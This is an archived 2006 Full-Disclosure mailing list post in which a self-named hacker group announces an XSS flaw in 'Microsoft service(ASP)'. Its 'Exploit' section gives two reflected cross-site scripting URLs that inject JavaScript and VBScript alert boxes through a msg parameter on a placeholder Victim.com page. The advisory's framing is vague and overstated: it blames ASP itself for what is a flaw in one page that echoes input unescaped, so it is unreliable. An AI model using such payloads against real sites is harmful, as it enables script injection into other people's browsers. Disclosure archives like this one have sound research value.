[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] New XSS attack to Microsoft service(ASP)

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] New XSS attack to Microsoft service(ASP)
From: saied hackeriran <saiedhackeriran@xxxxxxxxx>
Date: Sun, 19 Mar 2006 21:59:39 -0800 (PST)

                 In THe Name Of God
Group:HackeranShiraz
Discoverer:SaiedHacker
/*'============================================*/
We have found a security problem in Microsoft service(ASP).
This problem is a type of XSS attack and occurs while processing The 
information.
We can cause the problem by a simple (script)code.
/*'============================================*/
Exploit:
alert("SaiedHacker");Http://www.Victim.com/message.asp?msg=<script>alert("SaiedHacker");</script>
  
msgbox("SaiedHacker")Http://www.Victim.com/message.asp?msg=<script%20language=vbscript>msgbox("SaiedHacker")</script>
/*'===========================================*/
Have time of your life
SaiedHackerIran@xxxxxxxxx
www.SaiedHackerPro.persianBlog.com

                
---------------------------------
Yahoo! Mail
Bring photos to life! New PhotoMail  makes sharing a breeze.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Fwd: SURROUNDED
Next by Date: Re: [Full-disclosure] Links to Google's cache of 626 FrSIRT exploits
Previous by thread: Re: [Full-disclosure] Links to Google's cache of 626 FrSIRT exploits
Next by thread: [Full-disclosure] [ MDKSA-2006:056 ] - Updated xorg-x11 packages to address local root vuln
Index(es):
- Date
- Thread